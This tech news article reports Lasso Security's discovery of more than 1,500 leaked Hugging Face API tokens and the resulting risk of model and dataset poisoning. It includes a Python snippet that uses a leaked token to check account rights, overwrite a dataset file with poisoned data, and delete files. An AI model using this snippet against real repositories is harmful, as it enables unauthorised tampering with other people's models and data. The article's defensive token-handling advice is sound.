
Exposed API tokens from Meta, Microsoft, Google, and VMware, among others, were found on Hugging Face. The leak gave hackers access to hundreds of corporate accounts, and the impact could extend to millions of users.

More than 1,500 API tokens could be viewed on Hugging Face, posing a threat to at least 723 corporate accounts. That is the conclusion of an analysis by researchers at Lasso Security.

Major dangers

The exposure poses potentially significant dangers to several organizations and to the users of those organizations’ tools. Among the organizations at risk are big names such as Meta, Microsoft, Google and VMware.

The danger stems from the rights the API tokens grant an attacker. For 655 of the accounts, for example, the exposed tokens carried write permissions, allowing an attacker to modify files. According to the researchers, that makes it possible to tamper with LLMs, for instance by poisoning a model through manipulated training data. It is also possible to delete data, which can leave the LLM’s answers incomplete because it no longer has all the information about a topic.
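To illustrate how little a leaked write token leaves to the imagination, the sketch below uses the huggingface_hub Python client to check what a token can do and to overwrite or delete a file in a repository. This is an illustrative example, not Lasso’s actual tooling; the token value and the repository name are hypothetical placeholders.

```python
# Illustrative sketch: what a leaked Hugging Face token with write rights allows
# via the huggingface_hub client. Token and repo names are placeholders.
from huggingface_hub import HfApi

LEAKED_TOKEN = "hf_..."  # token scraped from a public repository (placeholder)

api = HfApi(token=LEAKED_TOKEN)

# 1. Identify the account behind the token (the exact fields in the response
#    may vary; the role typically indicates read or write access).
info = api.whoami()
print(info.get("name"))

# 2. With write access, an attacker could silently replace a file in a model
#    or dataset repository, e.g. swapping in poisoned training data.
api.upload_file(
    path_or_fileobj="poisoned_train.json",   # locally prepared malicious file
    path_in_repo="data/train.json",          # overwrites the legitimate file
    repo_id="some-org/some-dataset",         # hypothetical victim repository
    repo_type="dataset",
)

# 3. The same rights also allow deleting data, leaving the dataset incomplete.
api.delete_file(
    path_in_repo="data/train.json",
    repo_id="some-org/some-dataset",
    repo_type="dataset",
)
```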

The exposed API tokens would have allowed attackers to do exactly that with Llama 2. Llama 2 is a so-called “foundation model”: unlike a finished product such as GPT-4, it is explicitly meant to be trained further. Users start from a model that has already been pretrained, with the smallest variant counting 7 billion parameters. The model is a product of Meta and is openly available, which is why it can be found on the Hugging Face platform.

Bigger than Llama 2

The implications are not limited to Llama 2. The researchers were able to access 14 different datasets. These datasets are downloaded tens of thousands of times per month and have been downloaded by more than one million users in total. Public models with unsecured API tokens can therefore trigger a domino effect, where tampering with a single LLM quickly impacts large numbers of users. With private models the impact may remain more limited, but that does not make the risks any less significant: the researchers were able to gain access to 10,000 private models.

“The gravity of the situation cannot be overstated. With control over an organization that has millions of downloads, we have the ability to manipulate existing models and potentially turn them into malicious entities. This implies a serious threat, as the injection of corrupted models could affect millions of users who depend on these foundational models for their applications,” said Bar Lanyado, a security researcher at Lasso Security.

Tools as a solution

Although the researchers appear to have caught the leaks in time in this case, the analysis underscores the need for proper API security for LLMs. Tampering with an LLM’s training data can result in an AI application that confidently serves up falsehoods. That will cause major problems if users factor those untruths into their own output or decisions.

Exposed API tokens are the result of human error. They typically end up in the open when a developer forgets to keep tokens out of code that is pushed to a public repository. Using a tool to catch such mistakes goes a long way. GitHub, for example, offers Secret Scanning, and Hugging Face can also send a notification when API tokens are in danger of being exposed.
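A minimal sketch of the underlying hygiene, assuming the token is supplied via an environment variable rather than hardcoded in the source: the secret then lives in CI settings or a local file excluded from version control, so a push to a public repository cannot expose it.

```python
# Minimal sketch: keep the token out of committed code by reading it from the
# environment (or a secrets manager) instead of hardcoding it in the source.
import os
from huggingface_hub import HfApi

# HF_TOKEN is set outside the repository, e.g. in CI secrets or a local .env
# file listed in .gitignore; nothing secret ends up in version control.
token = os.environ["HF_TOKEN"]

api = HfApi(token=token)
print(api.whoami().get("name"))
```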

Hugging Face’s CEO, Clement Delangue, also said in a statement to The Register that the platform will take additional measures to better prevent such leaks in the future. “We are also working with external platforms such as GitHub to prevent valid tokens from being published in public repositories.”

Also read: OWASP lists the 10 biggest API dangers, help is on the way